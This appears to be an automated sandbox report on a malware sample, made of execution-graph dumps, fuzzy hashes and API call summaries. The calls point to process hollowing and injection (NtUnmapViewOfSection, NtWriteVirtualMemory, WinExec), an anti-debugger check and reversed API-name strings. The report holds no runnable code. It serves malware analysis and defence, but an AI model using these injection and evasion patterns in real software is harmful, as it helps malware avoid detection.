• Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 63423346da27cfc3b8e8f3338ebfcf02826cce1033e128aa658ec0b9537b3bc5
• Instruction ID: 87c4b448fae5053dfb6d6226f1e4ad6b3fc579ffe5b39ecfaa2699927f1e5c31
• Opcode Fuzzy Hash: 63423346da27cfc3b8e8f3338ebfcf02826cce1033e128aa658ec0b9537b3bc5
• Instruction Fuzzy Hash: 82811A76D012699BDB25CB54CC44BEEB7B9AF08750F0041DAEA5DB7290D7315E84CFA0

Execution Graph

Execution Coverage: 9.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 1473
Total number of Limit Nodes: 13
                                                                                                    execution_graph 24993 2acbb3c 24996 2abec6c 24993->24996 24995 2acbb44 24997 2abec74 24996->24997 24997->24997 26442 2ab8704 24997->26442 24999 2abec96 25000 2abec9b 24999->25000 25001 2abed20 25000->25001 26448 2ab881c 25001->26448 25003 2abed33 25004 2abed84 25003->25004 25005 2ab881c 3 API calls 25004->25005 25006 2abed97 25005->25006 25007 2abede8 25006->25007 25008 2abedf2 25007->25008 25009 2ab881c 3 API calls 25008->25009 25010 2abedfb 25009->25010 25011 2abee56 25010->25011 25012 2ab881c 3 API calls 25011->25012 25013 2abee5f 25012->25013 25014 2abeeba 25013->25014 25015 2ab881c 3 API calls 25014->25015 25016 2abeec3 25015->25016 25017 2abeee1 25016->25017 25018 2abef1e 25017->25018 25019 2ab881c 3 API calls 25018->25019 25020 2abef27 25019->25020 25021 2abef45 25020->25021 25022 2ab881c 3 API calls 25021->25022 25023 2abef8b 25022->25023 25024 2abef90 25023->25024 25025 2abef98 25024->25025 25026 2acaa1b 25024->25026 26452 2abebe8 25025->26452 25028 2abef9d 25028->25026 25029 2ab881c 3 API calls 25028->25029 25030 2abefcc 25029->25030 25031 2abefea 25030->25031 25032 2ab881c 3 API calls 25031->25032 25033 2abeff3 25032->25033 25034 2ab881c 3 API calls 25033->25034 25035 2abf026 25034->25035 25036 2abf05f 25035->25036 25037 2abf096 25036->25037 25038 2ab881c 3 API calls 25037->25038 25039 2abf0a2 25038->25039 25040 2ab881c 3 API calls 25039->25040 25041 2abf0d5 25040->25041 25042 2ab881c 3 API calls 25041->25042 25043 2abf108 25042->25043 25044 2ab881c 3 API calls 25043->25044 25045 2abf13b 25044->25045 25046 2abf15c 25045->25046 25047 2abf174 25046->25047 25048 2abf19e 25047->25048 25049 2ab881c 3 API calls 25048->25049 25050 2abf1b7 25049->25050 25051 2abf1f0 25050->25051 25052 2abf20f 25051->25052 25053 2abf21a 25052->25053 25054 2ab881c 3 API calls 25053->25054 25055 2abf233 25054->25055 25056 2ab881c 3 API calls 25055->25056 25057 2abf266 25056->25057 
25058 2abf276 25057->25058 25059 2ab881c 3 API calls 25058->25059 25060 2abf299 25059->25060 25061 2ab881c 3 API calls 25060->25061 25062 2abf2cc 25061->25062 25063 2abf2f8 25062->25063 25064 2abf324 25063->25064 25065 2ab881c 3 API calls 25064->25065 25066 2abf348 25065->25066 25067 2ab881c 3 API calls 25066->25067 25068 2abf37b 25067->25068 25069 2abf3a2 25068->25069 25070 2ab881c 3 API calls 25069->25070 25071 2abf3ae 25070->25071 25072 2ab881c 3 API calls 25071->25072 25073 2abf3e1 25072->25073 25074 2abf402 25073->25074 25075 2abf40d 25074->25075 25076 2abf41a 25075->25076 25077 2ab881c 3 API calls 25076->25077 25078 2abf45d 25077->25078 25079 2abf489 25078->25079 25080 2abf4c0 25079->25080 25081 2ab881c 3 API calls 25080->25081 25082 2abf4d9 25081->25082 25083 2abf500 25082->25083 25084 2ab881c 3 API calls 25083->25084 25085 2abf50c 25084->25085 25086 2abf533 25085->25086 25087 2ab881c 3 API calls 25086->25087 25088 2abf53f 25087->25088 25089 2ab881c 3 API calls 25088->25089 25090 2abf572 25089->25090 25091 2abf5ab 25090->25091 25092 2ab881c 3 API calls 25091->25092 25093 2abf5ee 25092->25093 25094 2abf627 25093->25094 25095 2ab881c 3 API calls 25094->25095 25096 2abf66a 25095->25096 25097 2abf68b 25096->25097 25098 2abf6a3 25097->25098 25099 2ab881c 3 API calls 25098->25099 25100 2abf6e6 25099->25100 25101 2abf707 25100->25101 25102 2abf71f 25101->25102 25103 2ab881c 3 API calls 25102->25103 25104 2abf762 25103->25104 25105 2abf771 25104->25105 25106 2abf79b 25105->25106 25107 2abf7d7 25106->25107 25108 2abf803 25107->25108 25109 2abf81b 25108->25109 25110 2ab881c 3 API calls 25109->25110 25111 2abf827 25110->25111 25112 2abf848 25111->25112 25113 2abf853 25112->25113 25114 2abf87f 25113->25114 25115 2abf897 25114->25115 25116 2ab881c 3 API calls 25115->25116 25117 2abf8a3 25116->25117 25118 2abf8c4 25117->25118 25119 2abf9d9 25118->25119 25120 2abf8cc 25118->25120 25122 2abfa05 25119->25122 25121 2abf8ed 25120->25121 25123 2abf924 25121->25123 25124 2abfa31 
25122->25124 25126 2ab881c 3 API calls 25123->25126 25125 2ab881c 3 API calls 25124->25125 25127 2abfa55 25125->25127 25128 2abf948 25126->25128 25130 2abfaad 25127->25130 25129 2abf9a0 25128->25129 25132 2ab881c 3 API calls 25129->25132 25131 2ab881c 3 API calls 25130->25131 25133 2abf9c4 25131->25133 25132->25133 25134 2abfb12 25133->25134 25135 2abfb2a 25134->25135 25136 2abfb49 25135->25136 25137 2ab881c 3 API calls 25136->25137 25138 2abfb6d 25137->25138 25139 2abfba6 25138->25139 25140 2abfbc5 25139->25140 25141 2abfbd0 25140->25141 25142 2ab881c 3 API calls 25141->25142 25143 2abfbe9 25142->25143 25144 2abfc20 25143->25144 25145 2abfc39 25144->25145 25146 2abfc5a 25145->25146 25147 2abfc72 25146->25147 25148 2ab881c 3 API calls 25147->25148 25149 2abfcb5 25148->25149 25150 2abfcd6 25149->25150 25151 2abfce1 25150->25151 25152 2abfcee 25151->25152 25153 2ab881c 3 API calls 25152->25153 25154 2abfd31 25153->25154 25155 2abfd5d 25154->25155 25156 2abfd6a 25155->25156 25157 2ab881c 3 API calls 25156->25157 25158 2abfdad 25157->25158 25159 2abfdd9 25158->25159 25160 2abfde6 25159->25160 25161 2ab881c 3 API calls 25160->25161 25162 2abfe29 25161->25162 25163 2abfe49 25162->25163 25164 2abfe75 25163->25164 25165 2abfea1 25164->25165 25166 2ab881c 3 API calls 25165->25166 25167 2abfec5 25166->25167 25168 2abfee6 25167->25168 25169 2abfefe 25168->25169 25170 2abff1d 25169->25170 25171 2abff28 25170->25171 25172 2ab881c 3 API calls 25171->25172 25173 2abff41 25172->25173 25174 2abff62 25173->25174 25175 2abff7a 25174->25175 25176 2abff99 25175->25176 25177 2abffa4 25176->25177 25178 2ab881c 3 API calls 25177->25178 25179 2abffbd 25178->25179 25180 2abffc7 25179->25180 25181 2abffdf 25180->25181 25182 2abffe7 25181->25182 25183 2ac07a3 25181->25183 25184 2ac0008 25182->25184 25186 2ac07cf 25183->25186 25185 2ac0013 25184->25185 25189 2ac0020 25185->25189 25187 2ac0806 25186->25187 25188 2ac0813 25187->25188 25190 2ab881c 3 API calls 25188->25190 25191 2ab881c 3 API 
calls 25189->25191 25192 2ac081f 25190->25192 25193 2ac0063 25191->25193 25195 2ac084b 25192->25195 25194 2ac0084 25193->25194 25196 2ac008f 25194->25196 25198 2ac0858 25195->25198 25197 2ac009c 25196->25197 25200 2ac00bb 25197->25200 25199 2ac0882 25198->25199 25201 2ac088f 25199->25201 25203 2ab881c 3 API calls 25200->25203 25202 2ab881c 3 API calls 25201->25202 25204 2ac089b 25202->25204 25205 2ac00df 25203->25205 25207 2ac08c7 25204->25207 25206 2ac0100 25205->25206 25208 2ac010b 25206->25208 25209 2ac08d4 25207->25209 25210 2ac0118 25208->25210 25211 2ac08f3 25209->25211 25212 2ac0137 25210->25212 25214 2ac090b 25211->25214 25213 2ac0142 25212->25213 25215 2ab881c 3 API calls 25213->25215 25216 2ab881c 3 API calls 25214->25216 25218 2ac015b 25215->25218 25217 2ac0917 25216->25217 25219 2ac0939 25217->25219 25220 2ac016c 25218->25220 25221 2ac0949 25219->25221 25222 2ac018d 25220->25222 25224 2ac096a 25221->25224 25223 2ac01b9 25222->25223 25227 2ac01e5 25223->25227 25225 2ac09ac 25224->25225 25226 2ac09b9 25225->25226 25229 2ab881c 3 API calls 25226->25229 25228 2ac01fd 25227->25228 25230 2ab881c 3 API calls 25228->25230 25231 2ac09c5 25229->25231 25232 2ac0209 25230->25232 25233 2ac09e6 25231->25233 25234 2ac0235 25232->25234 25236 2ac09f1 25233->25236 25235 2ac0261 25234->25235 25237 2ac0279 25235->25237 25238 2ac0a35 25236->25238 25240 2ab881c 3 API calls 25237->25240 25239 2ab881c 3 API calls 25238->25239 25241 2ac0a41 25239->25241 25242 2ac0285 25240->25242 25243 2ac0a62 25241->25243 25245 2ac02b1 25242->25245 25244 2ac0a6d 25243->25244 25246 2ac0a7a 25244->25246 25247 2ac02dd 25245->25247 25248 2ac0ab1 25246->25248 25249 2ac02f5 25247->25249 25251 2ab881c 3 API calls 25248->25251 25250 2ab881c 3 API calls 25249->25250 25253 2ac0301 25250->25253 25252 2ac0abd 25251->25252 25256 2ac0ad2 25252->25256 25254 2ac0316 25253->25254 25255 2ac0329 25254->25255 25257 2ac034a 25255->25257 25258 2ac0b06 25256->25258 25259 2ac0355 25257->25259 25261 2ac0b1e 
25258->25261 25260 2ac0381 25259->25260 25263 2ac0399 25260->25263 25262 2ac0b48 25261->25262 25264 2ab881c 3 API calls 25262->25264 25265 2ab881c 3 API calls 25263->25265 25266 2ac0b61 25264->25266 25267 2ac03a5 25265->25267 25269 2ac0b82 25266->25269 25268 2ac03c6 25267->25268 25270 2ac03d1 25268->25270 25271 2ac0b9a 25269->25271 25272 2ac03de 25270->25272 25275 2ac0bc4 25271->25275 25273 2ac03fd 25272->25273 25274 2ac0415 25273->25274 25276 2ab881c 3 API calls 25274->25276 25277 2ab881c 3 API calls 25275->25277 25279 2ac0421 25276->25279 25278 2ac0bdd 25277->25278 25282 2ac0bfe 25278->25282 25280 2ac0430 25279->25280 25281 2ac043a 25280->25281 25283 2ac079e 25281->25283 25284 2ac0442 25281->25284 25286 2ac0c16 25282->25286 25290 2ac1fa9 25283->25290 25285 2ac0463 25284->25285 25288 2ac046e 25285->25288 25287 2ac0c40 25286->25287 25289 2ab881c 3 API calls 25287->25289 25295 2ac04a5 25288->25295 25291 2ac0c59 25289->25291 25294 2ac1fed 25290->25294 25292 2ac0c68 25291->25292 25293 2ac0c77 25292->25293 25300 2ac0c98 25293->25300 25296 2ab881c 3 API calls 25294->25296 25297 2ab881c 3 API calls 25295->25297 25298 2ac1ff9 25296->25298 25299 2ac04be 25297->25299 25305 2ac201a 25298->25305 25302 2ac04ea 25299->25302 25301 2ac0cb0 25300->25301 25303 2ac0cda 25301->25303 25306 2ac0516 25302->25306 25304 2ac0ce7 25303->25304 25309 2ab881c 3 API calls 25304->25309 25307 2ac2069 25305->25307 25308 2ac052e 25306->25308 25311 2ab881c 3 API calls 25307->25311 25312 2ab881c 3 API calls 25308->25312 25310 2ac0cf3 25309->25310 25315 2ac0d14 25310->25315 25313 2ac2075 25311->25313 25314 2ac053a 25312->25314 25316 2ac2096 25313->25316 25319 2ac0566 25314->25319 25317 2ac0d1f 25315->25317 25321 2ac20a1 25316->25321 25318 2ac0d2c 25317->25318 25323 2ac0d56 25318->25323 25320 2ac0592 25319->25320 25322 2ac05aa 25320->25322 25324 2ac20e5 25321->25324 25327 2ab881c 3 API calls 25322->25327 25325 2ab881c 3 API calls 25323->25325 25326 2ab881c 3 API calls 25324->25326 25328 2ac0d6f 
25325->25328 25331 2ac20f1 25326->25331 25329 2ac05b6 25327->25329 25330 2ac0d79 25328->25330 25333 2ac05e2 25329->25333 25330->25283 25335 2ac0d81 25330->25335 25332 2ac211d 25331->25332 25334 2ac2149 25332->25334 25338 2ac060e 25333->25338 25337 2ac2154 25334->25337 25336 2ac0dd9 25335->25336 25341 2ac0df1 25336->25341 25342 2ab881c 3 API calls 25337->25342 25339 2ac0626 25338->25339 25340 2ab881c 3 API calls 25339->25340 25344 2ac0632 25340->25344 25346 2ab881c 3 API calls 25341->25346 25343 2ac216d 25342->25343 25343->25026 25348 2ac2192 25343->25348 25345 2ac0653 25344->25345 25347 2ac065e 25345->25347 25351 2ac0dfd 25346->25351 25349 2ac066b 25347->25349 26456 2aa46a4 25348->26456 25354 2ac068a 25349->25354 25353 2ac0e55 25351->25353 25352 2ac21cb 25355 2ac21ea 25352->25355 25357 2ac0e6d 25353->25357 25356 2ac06a2 25354->25356 25359 2ac2202 25355->25359 25358 2ab881c 3 API calls 25356->25358 25363 2ab881c 3 API calls 25357->25363 25360 2ac06ae 25358->25360 25361 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25359->25361 25362 2ac06b8 25360->25362 25365 2ac220e 25361->25365 25364 2ac06c5 25362->25364 25367 2ac0e79 25363->25367 25366 2ac06d6 25364->25366 25370 2ac2247 25365->25370 25368 2ac06e6 25366->25368 25372 2ac0ec6 25367->25372 25369 2ac0743 25368->25369 25371 2ac074e 25369->25371 25373 2ac227e 25370->25373 25376 2ac077a 25371->25376 25375 2ac0ede 25372->25375 25374 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25373->25374 25377 2ac228a 25374->25377 25379 2ac0f15 25375->25379 25378 2ac0792 25376->25378 25384 2ac22c3 25377->25384 25381 2ab881c 3 API calls 25378->25381 25380 2ab881c 3 API calls 25379->25380 25382 2ac0f21 25380->25382 25381->25283 25383 2ac0f4d 25382->25383 25385 2ac0f5a 25383->25385 25386 2ac22fa 25384->25386 25388 2ac0f79 25385->25388 25387 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25386->25387 25389 2ac2306 25387->25389 25391 2ac0f91 25388->25391 25390 2ac2327 25389->25390 25392 2ac2332 
25390->25392 25393 2ab881c 3 API calls 25391->25393 25395 2ac235e 25392->25395 25394 2ac0f9d 25393->25394 25396 2ac0fc9 25394->25396 25397 2ac2369 25395->25397 25398 2ac0fd6 25396->25398 25399 2ac2376 25397->25399 25401 2ac0ff5 25398->25401 25400 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25399->25400 25402 2ac2382 25400->25402 25404 2ac100d 25401->25404 25403 2ac238c 25402->25403 25407 2ac239e 25403->25407 25405 2ab881c 3 API calls 25404->25405 25406 2ac1019 25405->25406 25408 2ac103a 25406->25408 25410 2ac23cf 25407->25410 25409 2ac1052 25408->25409 25411 2ac1071 25409->25411 25412 2ac23e7 25410->25412 25413 2ac1089 25411->25413 25414 2ac241e 25412->25414 25415 2ab881c 3 API calls 25413->25415 25416 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25414->25416 25417 2ac1095 25415->25417 25418 2ac242a 25416->25418 25421 2ac10b6 25417->25421 25419 2ac244b 25418->25419 25420 2ac2456 25419->25420 25423 2ac2463 25420->25423 25422 2ac10f8 25421->25422 25425 2ac1105 25422->25425 25424 2ac248d 25423->25424 25426 2ac249a 25424->25426 25427 2ab881c 3 API calls 25425->25427 25428 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25426->25428 25429 2ac1111 25427->25429 25430 2ac24a6 25428->25430 25431 2ac1126 25429->25431 25432 2ac24b6 25430->25432 25434 2ac113c 25431->25434 25433 2ac24c6 25432->25433 25438 2ac24e7 25433->25438 25435 2ac1194 25434->25435 25436 2ac119f 25435->25436 25437 2ac11ac 25436->25437 25440 2ab881c 3 API calls 25437->25440 25439 2ac2536 25438->25439 25441 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25439->25441 25442 2ac11b8 25440->25442 25443 2ac2542 25441->25443 25445 2ac11d9 25442->25445 25444 2ac2563 25443->25444 25447 2ac256e 25444->25447 25446 2ac1210 25445->25446 25448 2ac1228 25446->25448 25449 2ac25b2 25447->25449 25450 2ab881c 3 API calls 25448->25450 25451 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25449->25451 25452 2ac1234 25450->25452 25453 2ac25be 25451->25453 
25455 2ac1255 25452->25455 25454 2ac25df 25453->25454 25458 2ac25ea 25454->25458 25456 2ac126d 25455->25456 25457 2ac1297 25456->25457 25460 2ab881c 3 API calls 25457->25460 25459 2ac262e 25458->25459 25461 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25459->25461 25462 2ac12b0 25460->25462 25463 2ac263a 25461->25463 25678 2ac12ba 25462->25678 25464 2ac264b 25463->25464 25465 2ac2661 25464->25465 25466 2ac2674 25465->25466 25467 2ac2695 25466->25467 25468 2ac26a0 25467->25468 25469 2ac26ad 25468->25469 25471 2ac26cc 25469->25471 25470 2ab881c 3 API calls 25473 2ac1336 25470->25473 25472 2ac26d7 25471->25472 25474 2ac26e4 25472->25474 25478 2ac1362 25473->25478 25475 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25474->25475 25476 2ac26f0 25475->25476 25477 2ac2711 25476->25477 25479 2ac271c 25477->25479 25480 2ac1399 25478->25480 25481 2ac2729 25479->25481 25482 2ac13a6 25480->25482 25486 2ac2748 25481->25486 25483 2ab881c 3 API calls 25482->25483 25484 2ac13b2 25483->25484 25485 2ac13cb 25484->25485 25488 2ac13ec 25485->25488 25487 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25486->25487 25490 2ac276c 25487->25490 25489 2ac1423 25488->25489 25491 2ac142e 25489->25491 25495 2ac27c4 25490->25495 25492 2ac143b 25491->25492 25493 2ab881c 3 API calls 25492->25493 25494 2ac1447 25493->25494 25497 2ac1473 25494->25497 25496 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25495->25496 25499 2ac27e8 25496->25499 25498 2ac1480 25497->25498 25500 2ac149f 25498->25500 25502 2ac2821 25499->25502 25501 2ac14aa 25500->25501 25503 2ab881c 3 API calls 25501->25503 25506 2ac2858 25502->25506 25504 2ac14c3 25503->25504 26458 2abe2f0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25504->26458 25508 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25506->25508 25507 2ac14cd 25507->25283 25509 2ac14d5 25507->25509 25528 2ac15e4 25507->25528 25507->25678 25510 2ac2864 25508->25510 25511 2ac14f6 25509->25511 
25512 2ac2882 25510->25512 25513 2ac152d 25511->25513 25517 2ac28af 25512->25517 25514 2ac1538 25513->25514 25515 2ac1545 25514->25515 25516 2ab881c 3 API calls 25515->25516 25518 2ac1551 25516->25518 25521 2ac28dc 25517->25521 25519 2ac157d 25518->25519 25520 2ac158a 25519->25520 25522 2ac15a9 25520->25522 25525 2ac2909 25521->25525 25523 2ac15b4 25522->25523 25524 2ab881c 3 API calls 25523->25524 25676 2ac15cd 25524->25676 25526 2ac298a 25525->25526 25527 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25526->25527 25531 2ac29a3 25527->25531 25529 2ac1647 25528->25529 25530 2ab881c 3 API calls 25529->25530 25534 2ac1660 25530->25534 25532 2ac2a06 25531->25532 25533 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25532->25533 25537 2ac2a1f 25533->25537 25535 2ac16c3 25534->25535 25536 2ab881c 3 API calls 25535->25536 25541 2ac16dc 25536->25541 25538 2ac2a49 25537->25538 25573 2ac2bbd 25537->25573 25540 2ac2a75 25538->25540 25539 2ac2c0b 25543 2ac2c42 25539->25543 25544 2ac2aac 25540->25544 25542 2ac173b 25541->25542 25549 2ac1753 25542->25549 25545 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25543->25545 25546 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25544->25546 25548 2ac2c5b 25545->25548 25552 2ac2ac5 25546->25552 25547 2ab881c 3 API calls 25547->25549 25550 2ac2c7c 25548->25550 25549->25547 25551 2ac178b 25549->25551 25554 2ac2cb3 25550->25554 25553 2ac17c2 25551->25553 25556 2ac2b28 25552->25556 25555 2ac17cf 25553->25555 25557 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25554->25557 25559 2ab881c 3 API calls 25555->25559 25558 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25556->25558 25562 2ac2cd7 25557->25562 25563 2ac2b41 25558->25563 25560 2ac17db 25559->25560 25561 2ac17fb 25560->25561 25564 2ac181c 25561->25564 25565 2ac2d2b 25562->25565 25568 2ac2ba4 25563->25568 25566 2ac1834 25564->25566 25570 2ac2d62 25565->25570 25567 2ac1853 25566->25567 25571 2ac185e 
25567->25571 25569 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25568->25569 25569->25573 25572 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25570->25572 25574 2ab881c 3 API calls 25571->25574 25577 2ac2d86 25572->25577 25573->25539 25575 2ac1877 25574->25575 25576 2ac1898 25575->25576 25578 2ac18a3 25576->25578 25580 2ac2dbf 25577->25580 25579 2ac18cf 25578->25579 25581 2ac18da 25579->25581 25582 2ac2df6 25580->25582 25584 2ab881c 3 API calls 25581->25584 25583 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25582->25583 25587 2ac2e02 25583->25587 25585 2ac18f3 25584->25585 25586 2ac1910 25585->25586 25590 2ac1934 25586->25590 25588 2ac2e2e 25587->25588 25589 2ac2e65 25588->25589 25592 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25589->25592 25591 2ac1976 25590->25591 25594 2ac1983 25591->25594 25593 2ac2e7e 25592->25593 25598 2ac2e9f 25593->25598 25595 2ab881c 3 API calls 25594->25595 25596 2ac198f 25595->25596 25597 2ac19b0 25596->25597 25600 2ac19bb 25597->25600 25599 2ac2ed6 25598->25599 25601 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25599->25601 25602 2ac19ff 25600->25602 25603 2ac2efa 25601->25603 25604 2ab881c 3 API calls 25602->25604 25605 2ac2f0f 25603->25605 26373 2ac4c65 25603->26373 25606 2ac1a0b 25604->25606 25611 2ac2f30 25605->25611 25607 2ac1a1c 25606->25607 25608 2ac1a40 25607->25608 25610 2ac1a4b 25608->25610 25609 2ac4c9c 25612 2ac4cd3 25609->25612 25616 2ac1a82 25610->25616 25614 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25611->25614 25613 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25612->25613 25615 2ac4cec 25613->25615 25617 2ac2f8b 25614->25617 25620 2ac4d0d 25615->25620 25618 2ab881c 3 API calls 25616->25618 25623 2ac2fac 25617->25623 25619 2ac1a9b 25618->25619 25621 2ac1ac7 25619->25621 25622 2ac4d44 25620->25622 25625 2ac1af3 25621->25625 25624 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25622->25624 
[Control-flow graph rendering. The graph's node and edge data was extracted as raw text and is summarised here rather than reproduced. The function at 02AB7A1F (see APIs below) drives a long chain of basic blocks in the 0x2AC1xxx-0x2ACAxxx range that repeatedly call a helper at 0x2AB881C performing NtWriteVirtualMemory, GetModuleHandleA and GetProcAddress; sibling helpers at 0x2AB8704 and 0x2AB8798 call the same three APIs. Other API-calling helpers reached from this graph: 0x2ABCF9C and 0x2ABAF50 (NtAllocateVirtualMemory, NtWriteVirtualMemory, GetModuleHandleA, GetProcAddress), 0x2AB8408 (GetModuleHandleA, GetProcAddress, WinExec), 0x2AB8184 (GetModuleHandleA, GetProcAddress, FlushInstructionCache), 0x2AB7DD0 and 0x2AB857C (GetModuleHandleA, GetProcAddress), 0x2AB8BA8 (7 API calls), and 0x2ABEC18 (CheckRemoteDebuggerPresent, with a branch at 0x2ABEC2A taken either way). The write path resolves its target through 0x2AB8061 (GetModuleHandleA) and 0x2AB8118 (GetProcAddress) before 0x2AB7D53 issues NtWriteVirtualMemory.]

Control-flow Graph

APIs
  • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AB7A1F
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 421316089-445027087
• Opcode ID: 63843e1d3ef46a0960a6b982f79c373f29d45aded4a7a09cd32257029f31405a
• Instruction ID: a77b7ddcdf62c368bdcb27c648dc5fb985c28b7418d2ddb1b10012b918a7d51e
• Opcode Fuzzy Hash: 63843e1d3ef46a0960a6b982f79c373f29d45aded4a7a09cd32257029f31405a
• Instruction Fuzzy Hash: C6115E75690208BFEB02EFA8DD91EDEB7ADEF8D710F418465B904D7641DA70AA10CB60

Control-flow Graph

APIs
  • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AB7A1F
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 421316089-445027087
• Opcode ID: 7583f65c5655cfa2693c3b4731b26b1dca0e08e88ec55c3e61ad0090e40a8928
• Instruction ID: 9b73e785e843a1e18e4cd6864f2417f2cc359c02d0886a59a7ad8a792dfe2a81
• Opcode Fuzzy Hash: 7583f65c5655cfa2693c3b4731b26b1dca0e08e88ec55c3e61ad0090e40a8928
• Instruction Fuzzy Hash: 53115E75690208BFEB02EF98DD91EDEB7ADEF8D710F418465B504D7641DA70AA10CB60

Control-flow Graph

APIs
  • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AB82BD
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressHandleMemoryModuleProcReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN
• API String ID: 2004920654-737317276
• Opcode ID: aa00350781c87c9eb6186dc28789440f2e729fa9712c9d74fe75567291fd23d1
• Instruction ID: f91e2454de6939e4c3dda8f5ff18aea9f4f56a2d2033a686917aa1afed13fa4f
• Opcode Fuzzy Hash: aa00350781c87c9eb6186dc28789440f2e729fa9712c9d74fe75567291fd23d1
• Instruction Fuzzy Hash: 0E015775A80208BFEB02EFA8D991E9ABBEEEF4C700F418460F404D7601CA74A910CB64

Control-flow Graph

APIs
  • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AB7D6C
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressHandleMemoryModuleProcVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW
• API String ID: 4260932595-3542721025
• Opcode ID: de48801b545988182b3a915e80c5c1d8e9b280f1e200b72880b7a7c2ab16f8c0
• Instruction ID: 8e8e16b7740f9011144adb34aebbfe2add3866e9f3b74e07f81cd5b13045878b
• Opcode Fuzzy Hash: de48801b545988182b3a915e80c5c1d8e9b280f1e200b72880b7a7c2ab16f8c0
• Instruction Fuzzy Hash: 0E012175650204BFDB02EF98DD51E9ABBEDFF8C750F514451B504E7681DA70A910CF60

Control-flow Graph

APIs
  • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02AB8521
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressHandleModuleProcSectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
• API String ID: 2801472262-2520021413
• Opcode ID: 85d395abacd604926b9741400d842b621477209a6a3049de18f051ae1e124e7d
• Instruction ID: 2c4987152b26f2347d05760f4093cb86c2bbfd2f9f19991242b6564506aac8bb
• Opcode Fuzzy Hash: 85d395abacd604926b9741400d842b621477209a6a3049de18f051ae1e124e7d
